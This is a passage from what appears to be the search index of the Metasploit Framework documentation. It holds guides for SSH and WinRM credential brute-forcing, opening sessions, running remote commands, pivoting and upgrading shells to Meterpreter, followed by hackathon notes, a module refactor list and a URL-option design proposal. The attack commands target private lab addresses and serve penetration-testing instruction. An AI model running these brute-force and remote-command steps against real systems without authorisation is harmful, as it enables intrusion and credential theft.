scanner/ssh/ssh_login run ssh://[email protected] threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use scanner/ssh/ssh_login run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . use scanner/ssh/ssh_login run cidr:/24:ssh://user:[email protected] threads=50 run cidr:/24:ssh://[email protected] threads=50 pass_file=./wordlist.txt . SSH Login Session . If you have valid SSH credentials the ssh_login module will open a Metasploit session for you: . use scanner/ssh/ssh_login run ssh://user:[email protected] . Re-using SSH credentials in a subnet: . use scanner/ssh/ssh_login run cidr:/24:ssh://user:[email protected] threads=50 . Using an alternative port: . use scanner/ssh/ssh_login run ssh://user:[email protected]:2222 . SSH Pivoting . It is only possible to perform SSH Pivoting if the remote target has the AllowTcpForwarding option be enabled in the server’s configuration file, which is often the default. If the option is disabled or the more specific PermitOpen option does not allow the connection to be made, the connection will fail with the administratively prohibited error. Like Meterpreter, it is possible to port forward through a Metasploit SSH session: . route add 172.18.103.0/24 ssh_session_id . To a route for the most recently opened Meterpreter session: . route add 172.18.103.0/24 -1 . ",
    "url": "/docs/pentesting/metasploit-guide-ssh.html#ssh-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-ssh.html#ssh-workflows"
  },"586": {
    "doc": "SSH",
    "title": "SSH",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-ssh.html",
    "relUrl": "/docs/pentesting/metasploit-guide-ssh.html"
  },"587": {
    "doc": "Upgrading Shells to Meterpreter",
    "title": "Upgrading shells to Meterpreter",
    "content": "If you have an existing session, either Meterpreter, an SSH, or a basic command shell - you can open a new Meterpreter session with: . sessions -u 3 . To upgrade the most recently opened session to Meterpreter using the sessions command: . sessions -u -1 . Or run the shell_to_meterpreter module manually: . use multi/manage/shell_to_meterpreter run session=-1 run session=-1 win_transfer=POWERSHELL run session=-1 win_transfer=VBS . If you want to upgrade your shell with fine control over what payload, use the PAYLOAD_OVERRIDE, PLATFORM_OVERRIDE, and on windows, PSH_ARCH_OVERRIDE. All 3 options are required to set an override on windows, and the first two options are required on other platforms, unless you are not using an override. use multi/manage/shell_to_meterpreter set SESSION 1 set PAYLOAD_OVERRIDE windows/meterpreter/reverse_tcp set PLATFORM_OVERRIDE windows set PSH_ARCH_OVERRIDE x64 . ",
    "url": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html#upgrading-shells-to-meterpreter",
    "relUrl": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html#upgrading-shells-to-meterpreter"
  },"588": {
    "doc": "Upgrading Shells to Meterpreter",
    "title": "Upgrading Shells to Meterpreter",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html",
    "relUrl": "/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html"
  },"589": {
    "doc": "WinRM",
    "title": "WinRM Workflows",
    "content": "Windows Remote Management (WinRM), is a way for clients to remotely manage Windows computers. WinRM is built on top of the Simple Object Access Protocol (SOAP) over HTTP(S). There are two main ports for WinRM: . | 5985/TCP - HTTP | 5986/TCP - HTTPS | . On older versions of Windows such as Windows 7/Windows Server 2008 the following ports were used: . | 80/TCP - HTTP | 443/TCP - HTTPS | . Important: Before running the chosen WinRM Metasploit module, first ensure that the RPORT and SSL values are configured correctly. Either with the modern inline option support: . use scanner/winrm/winrm_auth_methods run http://192.168.123.139:5985 run https://192.168.123.139:5986 . Or by manually setting options: . use scanner/winrm/winrm_auth_methods set RHOST 192.168.123.139 set RPORT 5985 set SSL false run . Metasploit has support for multiple WinRM modules, including: . | Authentication enumeration | Verifying/bruteforcing credentials | Running commands and opening sessions | . There are more modules than listed here, for the full list of modules run the search command within msfconsole: . msf6 &amp;gt; search winrm . Lab Environment . The WinRM modules work against Windows instances which have WinRM installed and configured. For a domain controller the Allow remote server management through WinRM policy will need be enabled. It is only possible to use WinRM against accounts which are part of the Remote Management Users group. WinRM over HTTPS requires the creation of a Server Authenticating Certificate, as well as enabling the transport mode: . winrm quickconfig -transport:https . Authentication Enumeration . Enumerate WinRm authentication mechanisms: . use scanner/winrm/winrm_auth_methods run http://192.168.123.139:5985 run https://192.168.123.139:5986 . Example: . msf6 auxiliary(scanner/winrm/winrm_auth_methods) &amp;gt; run http://192.168.123.139:5985 [+] 192.168.123.139:5985: Negotiate protocol supported [+] 192.168.123.139:5985: Kerberos protocol supported [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . WinRM Bruteforce . Brute-force host with known user and password list: . use scanner/winrm/winrm_login run https://[email protected]:5986 threads=50 pass_file=./wordlist.txt . Brute-force credentials: . use scanner/winrm/winrm_login run http://192.168.123.139:5985 threads=50 user_file=./users.txt pass_file=./wordlist.txt . Brute-force credentials in a subnet: . use scanner/winrm/winrm_login run cidr:/24:http://user:[email protected]:5985 threads=50 run cidr:/24:http://[email protected]:5985 threads=50 pass_file=./wordlist.txt . WinRM CMD . To execute arbitrary commands against a windows target: . use scanner/winrm/winrm_cmd run http://user:[email protected]:5985 cmd='whoami; ipconfig; systeminfo' . WinRM Login Session . If you have valid credentials the scanner/winrm/winrm_login module will open a Metasploit session for you: . use scanner/winrm/winrm_login run http://user:[email protected]:5985 . Example: . msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; run http://user:[email protected]:5985 [!] No active DB -- Credential data will not be saved! [+] 192.168.123.139:5985 - Login Successful: WORKSTATION\\user:pass [*] Command shell session 7 opened (192.168.123.1:58673 -&amp;gt; 192.168.123.139:5985 ) at 2022-04-23 02:36:34 +0100 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; sessions -i -1 [*] Starting interaction with 7... Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\\Users\\user&amp;gt; . Kerberos Authentication . Details on the Kerberos specific option names are documented in Kerberos Service Authentication . Open a WinRM session: . msf6 &amp;gt; use auxiliary/scanner/winrm/winrm_login msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; run rhost=192.168.123.13 username=Administrator password=p4$$w0rd winrm::auth=kerberos domaincontrollerrhost=192.168.123.13 winrm::rhostname=dc3.demo.local domain=demo.local [+] 192.168.123.13:88 - Received a valid TGT-Response [*] 192.168.123.13:5985 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_451736.bin [+] 192.168.123.13:88 - Received a valid TGS-Response [*] 192.168.123.13:5985 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20230118120604_default_192.168.123.13_mit.kerberos.cca_889546.bin [+] 192.168.123.13:88 - Received a valid delegation TGS-Response [+] 192.168.123.13:88 - Received AP-REQ. Extracting session key... [+] 192.168.123.13:5985 - Login Successful: demo.local\\Administrator:p4$$w0rd [*] Command shell session 1 opened (192.168.123.1:50722 -&amp;gt; 192.168.123.13:5985) at 2023-01-18 12:06:05 +0000 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/winrm/winrm_login) &amp;gt; sessions -i -1 [*] Starting interaction with 1... Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\\Users\\Administrator&amp;gt; . ",
    "url": "/docs/pentesting/metasploit-guide-winrm.html#winrm-workflows",
    "relUrl": "/docs/pentesting/metasploit-guide-winrm.html#winrm-workflows"
  },"590": {
    "doc": "WinRM",
    "title": "WinRM",
    "content": " ",
    "url": "/docs/pentesting/metasploit-guide-winrm.html",
    "relUrl": "/docs/pentesting/metasploit-guide-winrm.html"
  },"591": {
    "doc": "Metasploit Hackathons",
    "title": "Metasploit Hackathons",
    "content": "2016 . We hosted the first general Metasploit hackathon at the Rapid7 Austin Office Thursday 2016-09-15, starting at Noon (12pm) CST and going until 10am CST the following day. Got a cool Meterpreter extension you have wanted to try, module to write, or feature to add? We’ll be working both on new things and shepherding old-but-awesome things. Come join us on #metasploit on Freenode as well. 2017 . We hosted the second general Metasploit hackathon at the Rapid7 Austin Office and the Hyatt Place Arboretum, 2017-06-22 through 2017-06-25, including 15 developers. Combine a rotating cast of contributors, way too much food, a couple of guitars, and some incredibly outsized laptops, you end up with some great Metasploit hacking and fun. ",
    "url": "/docs/development/maintainers/metasploit-hackathons.html",
    "relUrl": "/docs/development/maintainers/metasploit-hackathons.html"
  },"592": {
    "doc": "Metasploit Loginpalooza",
    "title": "Modules to Refactor",
    "content": ". | auxiliary/gather/apache_rave_creds.rb | auxiliary/scanner/http/apache_userdir_enum.rb | auxiliary/voip/asterisk_login.rb | post/osx/gather/autologin_password.rb | auxiliary/scanner/http/axis_local_file_include.rb | exploits/windows/http/ca_arcserve_rpc_authbypass.rb | auxiliary/scanner/misc/cctv_dvr_login.rb | auxiliary/scanner/http/cisco_asa_asdm.rb | auxiliary/scanner/http/cisco_ironport_enum.rb | auxiliary/scanner/couchdb/couchdb_login.rb | auxiliary/gather/d20pass.rb | auxiliary/scanner/http/dell_idrac.rb | auxiliary/scanner/http/dlink_dir_300_615_http_login.rb | auxiliary/scanner/http/dlink_dir_615h_http_login.rb | auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb | auxiliary/scanner/http/dolibarr_login.rb | auxiliary/gather/doliwamp_traversal_creds.rb | auxiliary/server/capture/drda.rb | auxiliary/scanner/http/drupal_views_user_enum.rb | auxiliary/scanner/misc/dvr_config_disclosure.rb | auxiliary/gather/eaton_nsm_creds.rb | auxiliary/scanner/http/ektron_cms400net.rb | post/osx/gather/enum_osx.rb | post/windows/gather/enum_snmp.rb | post/windows/gather/enum_tomcat.rb | post/multi/gather/filezilla_client_cred.rb | exploits/multi/http/glassfish_deployer.rb | auxiliary/scanner/http/glassfish_login.rb | auxiliary/gather/hp_snac_domain_creds.rb | auxiliary/scanner/http/infovista_enum.rb | auxiliary/scanner/ipmi/ipmi_dumphashes.rb | auxiliary/scanner/oracle/isqlplus_login.rb | auxiliary/scanner/oracle/isqlplus_sidbrute.rb | exploits/linux/http/kloxo_sqli.rb | auxiliary/scanner/scada/koyo_login.rb | auxiliary/scanner/telnet/lantronix_telnet_password.rb | auxiliary/scanner/lotus/lotus_domino_hashes.rb | auxiliary/scanner/lotus/lotus_domino_login.rb | auxiliary/scanner/mongodb/mongodb_login.rb | post/linux/gather/mount_cifs_creds.rb | auxiliary/scanner/msf/msf_rpc_login.rb | auxiliary/scanner/msf/msf_web_login.rb | auxiliary/scanner/nessus/nessus_ntp_login.rb | auxiliary/scanner/nessus/nessus_xmlrpc_login.rb | auxiliary/scanner/nexpose/nexpose_api_login.rb | auxiliary/scanner/http/novell_mdm_creds.rb | auxiliary/scanner/misc/oki_scanner.rb | auxiliary/scanner/http/openmind_messageos_login.rb | auxiliary/scanner/openvas/openvas_gsad_login.rb | auxiliary/scanner/openvas/openvas_omp_login.rb | auxiliary/scanner/openvas/openvas_otp_login.rb | auxiliary/scanner/http/oracle_ilom_login.rb | post/windows/gather/credentials/outlook.rb | auxiliary/scanner/http/owa_login.rb | auxiliary/scanner/pcanywhere/pcanywhere_login.rb | post/multi/gather/pgpass_creds.rb | auxiliary/scanner/postgres/postgres_version.rb | post/linux/gather/pptpd_chap_secrets.rb | auxiliary/scanner/http/radware_appdirector_enum.rb | auxiliary/scanner/misc/raysharp_dvr_passwords.rb | post/windows/gather/credentials/razer_synapse.rb | post/windows/gather/credentials/razorsql.rb | auxiliary/scanner/rservices/rexec_login.rb | auxiliary/scanner/http/rfcode_reader_enum.rb | auxiliary/scanner/rservices/rlogin_login.rb | auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb | auxiliary/scanner/rservices/rsh_login.rb | auxiliary/scanner/http/sap_businessobjects_user_brute.rb | auxiliary/scanner/http/sap_businessobjects_user_brute_web.rb | auxiliary/scanner/http/sap_businessobjects_user_enum.rb | auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb | auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb | auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb | auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb | auxiliary/scanner/sap/sap_web_gui_brute_login.rb | auxiliary/scanner/http/sentry_cdu_enum.rb | auxiliary/scanner/http/sevone_enum.rb | auxiliary/scanner/oracle/sid_brute.rb | auxiliary/admin/oracle/sid_brute.rb | auxiliary/server/capture/sip.rb | post/windows/gather/credentials/smartermail.rb | post/windows/gather/credentials/spark_im.rb | auxiliary/scanner/http/splunk_web_login.rb | auxiliary/scanner/http/squiz_matrix_user_enum.rb | auxiliary/scanner/ssh/ssh_identify_pubkeys.rb | auxiliary/scanner/telnet/telnet_ruggedcom.rb | auxiliary/scanner/http/titan_ftp_admin_pwd.rb | auxiliary/scanner/http/tomcat_enum.rb | post/windows/gather/credentials/tortoisesvn.rb | post/windows/gather/credentials/total_commander.rb | auxiliary/scanner/http/typo3_bruteforce.rb | auxiliary/gather/vbulletin_vote_sqli.rb | exploits/unix/webapp/vbulletin_vote_sqli_exec.rb | auxiliary/scanner/http/vcms_login.rb | auxiliary/scanner/vmware/vmware_http_login.rb | auxiliary/scanner/dcerpc/windows_deployment_services.rb | auxiliary/scanner/http/wordpress_login_enum.rb | auxiliary/gather/wp_w3_total_cache_hash_extract.rb | . Special attention needed . | post/windows/gather/enum_domain.rb - Partials, should create realms but not full cores | post/windows/gather/enum_domain_group_users.rb - Should create realms and publics but won’t be able to get privates | post/windows/gather/enum_domains.rb - Creates realms | post/windows/gather/enum_logged_on_users.rb - Creates publics but not privates | . ",
    "url": "/docs/development/maintainers/metasploit-loginpalooza.html#modules-to-refactor",
    "relUrl": "/docs/development/maintainers/metasploit-loginpalooza.html#modules-to-refactor"
  },"593": {
    "doc": "Metasploit Loginpalooza",
    "title": "Metasploit Loginpalooza",
    "content": "The Loginpalooza contest is over! Congrats and thanks to @TomSellers, @ChrisTruncer, and @0a2940! . The list of modules to refactor is still here. Modules that get refactored should be removed from the list entirely. If you’d like to learn how to convert your favorite existing module, or write a new module, using the new LoginScanner mixin and the Credentials gem, please take a look at Creating Metasploit Framework LoginScanners. ",
    "url": "/docs/development/maintainers/metasploit-loginpalooza.html",
    "relUrl": "/docs/development/maintainers/metasploit-loginpalooza.html"
  },"594": {
    "doc": "Metasploit URL support proposal",
    "title": "Problems",
    "content": " ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#problems",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#problems"
  },"595": {
    "doc": "Metasploit URL support proposal",
    "title": "Multiple Options",
    "content": "Metasploit currently provides multiple options for configuring target details: . | RHOSTS | RPORT | VHOST | TARGETURI | SSL | USER | PASS | . Configuring this amount of options is cumbersome and time consuming on a per module basis. Although it is is possible to globally setting common values with the setg command - and to individually override the ports on a per module basis, it is still an arduous task: . setg RHOSTS x.x.x.x use module/foo set RPORT yyy run . Running module against unique targets . It is currently verbose when running modules against multiple targets, with independent ports and target paths. This must be done manually: . use module/foo set RHOST target1 set TARGETURI /jenkins run set RHOST target2 set TARGETURI /admin/jenkins run . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#multiple-options",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#multiple-options"
  },"596": {
    "doc": "Metasploit URL support proposal",
    "title": "Approaches",
    "content": "So far there’s three main potential approaches to add URL support to msfconsole: . | Consolidating Options - Combining multiple options such as RHOST/RPORT/SSL/etc into one new option: TARGETS | Enriching RHOSTS with URL support - The RHOST’s option is modified to support URLs, and attempts to keep all options such as RHOST/PORT/SSL etc in sync. | Support setting a single RHOST_URL - Metasploit console will now support setting a single RHOST_URL value. Note that this wouldn’t show as an option to the user, but would be used as a ‘macro’ to populate the existing datastore values | . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#approaches",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#approaches"
  },"597": {
    "doc": "Metasploit URL support proposal",
    "title": "1. Consolidating Options",
    "content": "Combining the module target options into one would help reduce the amount of steps required to configure a module: . set TARGETS https://user:password@target_app:4343 . When the user views the options for a given module, it will be consolidated. The user will no longer see options such as RPORT, SSL . Before . Multiple options are available for configuring the module options: . msf5 exploit(multi/http/tomcat_mgr_upload) &amp;gt; options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /manager yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Java Universal . After . Multiple options are consolidated into a single TARGETS field: . msf5 exploit(multi/http/tomcat_mgr_upload) &amp;gt; options Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST_URLS yes The target host URL(s), or file with syntax 'file:&amp;lt;path&amp;gt;' Exploit target: Id Name -- ---- 0 Java Universal . Examples . It is now possible to run an individual module against different hosts, paths, and ports: . use exploit/multi/http/jenkins_script_console set TARGETS http://target1:9000/jenkins, http://target2:8080/admin/jenkins check . It is now possible to run an individual module against different hosts, paths, and ports: . use auxiliary/scanner/http/title set TARGETS https://google.com http://example.com run . It would still be possible to use IPv4/IPv6/CIDR syntax directly: . set TARGETS 192.168.1.5:139 . However - it is no longer clear how to use CIDR notation and set path information, other than making up a new syntax: . set TARGETS https://10.0.0.0/24:8080/some/app . Advantages . | As a user it’s now easy to configure one option | A single option is less overwhelming to the user when available module options | The user can directly copy/paste a URL from their browser into msfconsole to run a check module against | A module can now be run against multiple arbitrary targets with independent paths / ports | Helps to catch improperly set ports. For instance, setting the SSL option to true - but forgetting to update RPORT to 443 | Simple to implement with a known effort | . Disadvantages . | The option consolidation breaks the majority of existing module documentation | It’s no longer clear to use use CIDR notation and setting path information, other than making up a new syntax? | Breaks the user’s existing muscle memory for configuring modules | Hard to make a change to a single value, i.e. setting targets then wishing to modify the target URI or port uniformly | Lose the ability to easily set a single global RHOST value, and set the ports individually on a per module basics | We lose the ability to have sane defaults set for options, such as: . | TARGETURI = /manager | RPORT = 139 | . | The modules additionally lose the descriptive metadata for the significance of fields, such as TARGETURI: | . Module options (exploit/multi/http/jenkins_script_console): Name Current Setting Required Description ---- --------------- -------- ----------- ... TARGETURI /jenkins/ yes The path to the Jenkins-CI application ... ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#1-consolidating-options",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#1-consolidating-options"
  },"598": {
    "doc": "Metasploit URL support proposal",
    "title": "2. Enriching RHOSTS with URL support",
    "content": "The RHOSTS field is updated to support a URL formats: . set RHOSTS http://target1:9000/jenkins . Before / After . The multiple options are still available to the user, there is no change to this behavior: . set RHOSTS https://a.site.com/foo Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/foo yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /foo yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . Examples . The use of RHOSTS continues to be a valid option name: . set RHOSTS https://a.site.com/foo . The options are now individually updated with corresponding values: . set RHOSTS https://a.site.com/foo Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/foo yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /foo yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . If the user wishes to update an individual option, the rhost’s value will be recomputed: . set RHOSTS https://a.site.com/foo set TARGETURI /bar Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/bar yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /bar yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . The user can set multiple RHOSTS, with each option being comma delimited within the options table: . set RHOSTS https://a.site.com/foo http://b.site.com/bar Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/bar, http://b.site.com/bar yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /foo, /bar yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, b.site.com no HTTP server virtual host . The user can continue to set override individual options uniformly: . set RHOSTS https://a.site.com/foo http://b.site.com/bar set TARGETURI /new Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/new, http://b.site.com/new yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /new yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, b.site.com no HTTP server virtual host . The user can set new path values individually: . set RHOSTS https://a.site.com/foo http://b.site.com/bar set TARGETURI /abc /xyz Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/abc http://b.site.com/xyz yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /abc, /xyz yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, b.site.com no HTTP server virtual host . Alternatively: The above scenario is intuitive when used with multiple RHOSTS, however when a single RHOST is used the user may intend for setting TARGETURI to behave differently. In this scenario the user may expect two scans to be ran against the single target: . set RHOSTS https://a.site.com/foo set TARGETURI /abc /xyz Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS https://a.site.com/abc https://a.site.com/xyz yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443, 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /abc, /xyz yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com, a.site.com no HTTP server virtual host . It’s still possible to use the CIDR range notation, but the support remains closer to the current Metasploit console workflow: . set RHOSTS 192.168.100.0/22 set TARGETURI /tomcat set SSL true Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.100.0/22 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 80 yes The target port (TCP) SSL true, false no Negotiate SSL/TLS for outgoing connections TARGETURI /tomcat yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST no HTTP server virtual host . Advantages . | It’s possible to configure the target with one set command | Backwards compatible | The user can directly copy/paste a URL from their browser into msfconsole to run a check module against | A module can now be run against multiple arbitrary targets with independent paths / ports | Helps to catch improperly set ports. For instance, setting the SSL option to true - but forgetting to update RPORT to 443 | The existing metadata/options remains intact for the user to view | CIDR notation can continue to be used | . Disadvantages . | This is a novel implementation effort. The current design of Metasploit framework’s Options/Datastore doesn’t support computed / dependent options. | More complicated to implement than a single TARGETS option | The intuition of computed options paired with last write winning might be confusing to users - but this would need to be tested | . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#2-enriching-rhosts-with-url-support",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#2-enriching-rhosts-with-url-support"
  },"599": {
    "doc": "Metasploit URL support proposal",
    "title": "3. Support setting a single RHOST_URL",
    "content": "Metasploit console will now support setting a single RHOST_URL value. Note that this wouldn’t show as an option to the user, but would be used as a ‘macro’ to populate the existing datastore values: . set RHOST_URL https://a.site.com/foo Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS a.site.com yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /foo yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . After this convenience option has been set, it is now possible to use the normal workflow of msfconsole to set further options: . set RURL https://a.site.com/foo set TARGETURI /bar set SSL FALSE set RPORT 80 Module options (exploit/multi/http/tomcat_mgr_upload): Name Current Setting Required Description ---- --------------- -------- ----------- HttpPassword no The password for the specified username HttpUsername no The username to authenticate as Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS a.site.com yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:&amp;lt;path&amp;gt;' RPORT 80 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI /bar yes The URI path of the manager app (/html/upload and /undeploy will be used) VHOST a.site.com no HTTP server virtual host . Similarly this functionality would set all options of the global store as expected: . setg RHOST_URL https://a.site.com/foo setg Global ====== Name Value ---- ----- RHOST a.site.com RPORT 443 SSL true TARGETURI /foo VHOST a.site.com . Advantages . | Simpler to reason about as an end user | Less complex to implement, and can be built upon the current Options/Datastore implementation with relative ease | As a user it’s now easy to configure one option | The user can directly copy/paste a URL from their browser into msfconsole to run a check module against | Helps to catch improperly set ports. For instance, setting the SSL option to true - but forgetting to update RPORT to 443 | Backwards compatible | The existing metadata/options remains intact for the user to view | . Disadvantages . | It is not possible to set multiple multiple targets. However this can still be implemented with resource scripts. | Harder to discover, we will have to add extra affordance for this - and make additional noise to help increase the awareness of this new functionality | Users may raise issues asking for the next obvious step of multiple targets | Future compatibility issues. If we decide implement support for multiple independent targets, there’s some baggage introduced in needing to alias RURL to RURLS etc. | . Additional considerations . | How likely are individuals to actually scan against completely arbitrary endpoints with independent ports etc in the real world? | There will be no changes to the SSL_VERSION option as part of this effort | When setting multiple targets, is a comma delimited string \", \" to separate targets the best approach? It’s technically possible that copied URLs from the browser potentially contain this substring. Additional affordance may need to be added to ensure commas without a trailing whitespace is notified as being a potential issue. | The naming of TARGETURI is unintuitive, perhaps it could be renamed to RPATH | The chosen implementation should ensure file support is not broken . | https://github.com/rapid7/metasploit-framework/pull/11497 | . | Consistency across module types, and external modules, will have to be ensured: . | https://github.com/rapid7/metasploit-framework/issues/13061 | . | Will database modules be impacted by this change? It is currently unclear. | Postgres natively supports connection strings and the notation is not novel postgres://{user}:{password}@{hostname}:{port}/{database-name} | . | Will FTP modules be impacted by this change? It is currently unclear. | FTP URL syntax is described in RFC 1738, taking the form: ftp://[user[:password]@]host[:port]/url-path | . | Will SRVHOST by impacted by this change? This will remain the same, but could be changed. | SRVHOST- The local host to listen on. This must be an address on the local machine or 0.0.0.0 | SRVPORT 8080 - The local port to listen on. | . | Allowing multiple arbitrary targets with independent ports, protocols etc, is potentially a different development effort to allowing rhosts to support URL syntax. | . ",
    "url": "/docs/development/propsals/metasploit-url-support-proposal.html#3-support-setting-a-single-rhost_url",
    "relUrl": "/docs/development/propsals/metasploit-url-support-proposal.html#3-support-setting-a-single-rhost_url"
  },"600": {
    "doc": "Metasploit URL support proposal",
    "title": "Similar Efforts",
    "content": "RouterSploit . Routersploit is a Python exploitation framework for embedded devices. The interactive console allows the user to specify a TARGET option. This value can only be configured with a valid IPv4/IPv6 address: . rsf &amp;gt; use exploits/routers/2wire/ rsf (2Wire Gateway Auth Bypass) &amp;gt; show options Target options: Name Current settings Description ---- ---------------- ----------- ssl false SSL enabled: true/false target Target IPv4, IPv6 address: 192.168.1.1 port 80 Target HTTP port Module options: Name Current settings Description ---- ---------------- ----------- verbosity true Verbosity enabled: true/false . With a module that supports a configurable path: . rsf &amp;gt; use exploits/generic/shellshock rsf (Shellshock) &amp;gt; show options Target options: Name Current settings Description ---- ---------------- ----------- ssl false SSL enabled: true/false target Target IPv4 or IPv6 address port 80 Target HTTP port Module options: Name Current settings Description ---- ---------------- ----------- verbosity true Verbosity enabled: true/false path / Url path method GET HTTP method header User-Agent HTTP 